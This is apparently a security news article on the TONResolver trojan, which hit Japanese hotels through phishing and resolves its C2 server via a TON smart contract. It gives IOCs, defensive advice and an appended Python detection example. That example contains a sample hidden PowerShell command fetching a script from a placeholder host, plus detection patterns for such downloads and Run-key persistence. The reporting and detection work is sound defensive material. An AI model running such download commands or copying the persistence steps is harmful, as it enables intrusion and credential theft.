TONResolver Malware Uses TON Blockchain to Switch C2 Servers in Japan Hotel Phishing Campaign
A new malware campaign is targeting Japanese accommodation businesses with phishing emails that impersonate Booking.com-related guest complaints and review requests.
The malware, tracked as TONResolver, uses The Open Network blockchain to hide and update its command-and-control server address. According to Trend Micro’s report, attackers began sending the phishing emails in late May 2026 to Japanese partner companies that use Booking.com.
The main risk is not only the first infection. Once TONResolver runs on a victim’s system, it can keep a live connection with attacker infrastructure, send endpoint information, and wait for additional commands.
TONResolver turns blockchain into a C2 lookup system
TONResolver stands out because it does not store a fixed command-and-control domain inside the malware. Instead, it queries a TON smart contract through the TON API service and retrieves the current attacker-controlled server address from the blockchain.
This technique is known as a dead drop resolver. In simple terms, the malware checks an outside location for instructions on where to connect next. If defenders block one server, the attacker can update the smart contract and redirect infected machines to a new server.
The technique fits the broader MITRE ATT&CK Dynamic Resolution category, where attackers dynamically change command-and-control connection details to avoid detection and takedown.
How the phishing campaign works
The campaign starts with emails written to look like urgent hotel business messages. Some emails claim that a guest submitted a serious complaint. Others ask staff to review stay-related photos, videos, or attached evidence.
Trend Micro observed two main delivery methods. One used bulk phishing emails with Japanese-language subjects such as “Important: Guest Stay Review Request.” The other used a conversational approach through Gmail, where the attacker first sent a normal inquiry and delivered the malicious link only after the hotel replied.
This trust-building step makes the campaign harder for staff to spot. A hotel employee may expect follow-up messages from guests, especially when the topic involves complaints, reservations, or room availability.
| Stage | What happens | Why it matters |
|---|---|---|
| Phishing email | Attackers send Booking.com-themed complaint or inquiry messages | Hotel staff are pushed to click a link quickly |
| ZIP download | The link downloads an archive from attacker infrastructure | The malware arrives disguised as business-related material |
| LNK execution | A shortcut file disguised as a photo launches PowerShell | User execution starts the infection chain |
| PowerShell script | The script downloads and prepares the payload | The attack uses native Windows scripting to move forward |
| Node.js runtime | Node.js is downloaded and placed under the user profile | A legitimate runtime executes the malicious JavaScript file |
| TONResolver | The malware queries TON and connects to the retrieved C2 server | Attackers can switch infrastructure without changing the payload |
Node.js helps the malware blend in
The payload is a JavaScript file executed with Node.js. In observed samples, the malware retrieved Node.js version 24.13.0 from the official Node.js distribution path if node.exe was not already present.
The runtime and payload were placed under the user’s AppData folder. This helped the malware run without installing a traditional executable in a more obvious location.
TONResolver also uses VM-based obfuscation. Its logic is converted into a custom virtual instruction set, which makes static analysis harder and slows down detection engineering.
What TONResolver does after infection
After execution, TONResolver checks whether another copy is already running, sets persistence through the Windows registry Run key, then performs a connectivity check.
It then calls the TON smart contract through the TON API REST service using a method named get_domain. The returned value gives the malware the active command-and-control server.

After connecting, the malware uses encrypted WebSocket communication. Trend Micro reported the use of ECDH, HKDF-SHA256, and AES-256-CBC for its command-and-control traffic, making simple network string inspection less effective.
- Checks for duplicate execution through a mutex-style mechanism
- Sets persistence through HKCU registry Run keys
- Queries tonapi[.]io for the active C2 domain
- Sends endpoint data such as username, hostname, OS, CPU, memory, and MAC address
- Maintains a keepalive loop with the attacker-controlled server
- Supports follow-on command execution and payload delivery
Credential theft followed some infections
Trend Micro said the malware does not immediately steal files or credentials at the first stage. Instead, it appears to give attackers a foothold that can support later command execution.
Observed follow-on activity included attempts to steal credentials and browser data. The targets included Chrome and Edge passwords, cookies, history, and autofill content.
This matters for hotels because one infected front-desk or back-office machine can expose booking portals, email accounts, payment-related workflows, and partner systems. Credential theft can also let attackers return later through legitimate accounts.
Why the TON smart contract method is difficult to disrupt
Blocking one C2 domain may not end the infection. The attacker can write a new domain into the TON smart contract, and infected systems can retrieve the new destination during the next lookup.
That is why the campaign aligns with the dynamic resolution technique. The malware separates the payload from its current infrastructure, giving attackers more room to recover when defenders block domains.
Trend Micro’s blockchain analysis found multiple C2 domain changes written to the TON contract, including entries from February 2026 and June 2026. This shows the resolver mechanism was not only theoretical, but actively used.
| Indicator type | Indicator | Description |
|---|---|---|
| Detection name | TrojanSpy.JS.TONRESOLVER.A | Trend Micro detection for the JavaScript RAT payload |
| TON API domain | tonapi[.]io | Legitimate TON API service abused for C2 resolution |
| TON method | methods/get_domain | Smart contract method used to retrieve the active C2 domain |
| Resolver contract | 0:c66119f0e5635c4380441d7a79baf0c02a0ab7ea6cd78de06507fc5dc2c1a5d9 | TON contract used to store the C2 domain |
| Updater contract | 0:6d5b44d0678e6bd6703f2cabd2531ccf5a0b11cc081f8f7175bd679db4c12d41 | Attacker-controlled TON contract tied to C2 updates |
| Payload path | %USERPROFILE%\AppData\Local\Nodejs\(unknown).js | Location where the JavaScript payload is saved |
| Node.js path | %USERPROFILE%\AppData\Local\Nodejs\node-v24.13.0-win-x64\ | Directory used for the Node.js runtime |
| Persistence key | HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Registry location used to restart the malware |
Defenders should watch PowerShell, Node.js, and TON traffic
Hotels and managed IT providers supporting accommodation businesses should review endpoint telemetry for PowerShell downloading scripts from suspicious domains. They should also check for Node.js running from AppData paths rather than approved development folders.
The Trend Micro recommendations include restricting connectivity to TON services where they are not needed for business operations. Blocking tonapi[.]io can interrupt the resolver stage of this attack chain.

Security teams should also train hotel staff to treat complaint-themed emails with caution. Messages that ask staff to download photos, videos, or evidence through external links deserve extra review, even when they appear to concern a real reservation issue.
- Block or monitor access to tonapi[.]io where blockchain access is not required
- Restrict PowerShell from retrieving files from the internet
- Alert on node.exe running from AppData or temporary user folders
- Inspect LNK files delivered inside ZIP archives
- Review registry Run keys for suspicious JavaScript or Node.js execution
- Reset passwords and browser sessions on systems that show signs of compromise
- Monitor hotel booking, email, and payment-related accounts for suspicious logins
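The hunting points above, as an added example that is not part of the article or of Trend Micro's material: a small Python triage function that applies them to constructed endpoint events. The event shape, field names, user name, the download URL, and the `payload.js` file name are assumptions (the article does not name the payload file).

```python
import re

# Indicators taken from the article; every event below is constructed for illustration.
TON_API_DOMAIN = "tonapi.io"
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
USER_DIR_RE = re.compile(r"\\AppData\\|\\Temp\\", re.IGNORECASE)
PS_DOWNLOAD_RE = re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|\biwr\b|Start-BitsTransfer", re.IGNORECASE)

NODE_PATH = r"C:\Users\frontdesk\AppData\Local\Nodejs\node-v24.13.0-win-x64\node.exe"  # constructed user
PAYLOAD = r"C:\Users\frontdesk\AppData\Local\Nodejs\payload.js"  # placeholder name; real name unknown
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [  # constructed telemetry in the order the infection chain would produce it
    {"type": "process", "image": PS_EXE, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -c Invoke-WebRequest http://example.invalid/x.ps1 -OutFile $env:TEMP\\x.ps1"},
    {"type": "process", "image": NODE_PATH, "parent": PS_EXE, "cmdline": f"node.exe {PAYLOAD}"},
    {"type": "dns", "image": NODE_PATH, "query": "tonapi.io"},
    {"type": "registry", "key": RUN_KEY + r"\NodeUpdate", "value": f"{NODE_PATH} {PAYLOAD}"},
    # Benign developer use: node.exe from its normal install location, started from a shell
    {"type": "process", "image": r"C:\Program Files\nodejs\node.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "node.exe server.js"},
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(events):
    """Return (rule, detail) pairs for events that match the article's hunting points."""
    alerts = []
    for ev in events:
        if ev["type"] == "process":
            img = basename(ev["image"])
            if img == "powershell.exe" and PS_DOWNLOAD_RE.search(ev["cmdline"]):
                alerts.append(("powershell_download", ev["cmdline"]))
            if img == "node.exe" and USER_DIR_RE.search(ev["image"]):
                alerts.append(("node_from_user_dir", ev["image"]))
        elif ev["type"] == "dns":
            q = ev["query"].lower().rstrip(".")
            if q == TON_API_DOMAIN or q.endswith("." + TON_API_DOMAIN):
                alerts.append(("ton_api_lookup", f"{basename(ev['image'])} -> {q}"))
        elif ev["type"] == "registry":
            # Run-key value that launches node.exe or a .js file is the persistence pattern described
            if ev["key"].lower().startswith(RUN_KEY.lower()) and re.search(r"node\.exe|\.js\b", ev["value"], re.I):
                alerts.append(("run_key_node_persistence", ev["key"]))
    return alerts

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The benign event at the end produces no alert, which is the distinction between approved development folders and AppData paths the article draws.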
Japan’s hotel sector remains the primary target
The campaign currently centers on Japanese accommodation facilities, but the technique can spread to other regions and industries. Any organization that relies heavily on email-based customer communication could face similar lures.
TONResolver also shows how attackers can combine familiar phishing, legitimate runtimes, blockchain infrastructure, and encrypted communication into one infection chain. Each layer makes the activity harder to stop with a single control.
The practical response is clear. Organizations should reduce unnecessary blockchain access, harden script execution, monitor unusual Node.js behavior, and investigate any endpoint that recently opened suspicious guest complaint archives.
FAQ
TONResolver is a JavaScript-based remote access trojan that runs through Node.js. It uses a TON smart contract to retrieve its current command-and-control server address.
Trend Micro reported that the observed campaign targeted Japanese accommodation facilities that use Booking.com, mainly through phishing emails disguised as guest complaints, review requests, or hotel inquiries.
TONResolver queries a TON smart contract through tonapi.io and retrieves the active C2 domain from a method called get_domain. This lets attackers change the server address without changing the malware file.
The malware uses Node.js to execute its JavaScript payload. In observed attacks, the runtime was downloaded and stored under the user profile, which helped the payload run through a legitimate platform.
Organizations should restrict unnecessary access to TON services, block PowerShell from downloading external files where possible, monitor node.exe running from AppData, inspect LNK files in ZIP archives, and review registry Run keys for suspicious persistence.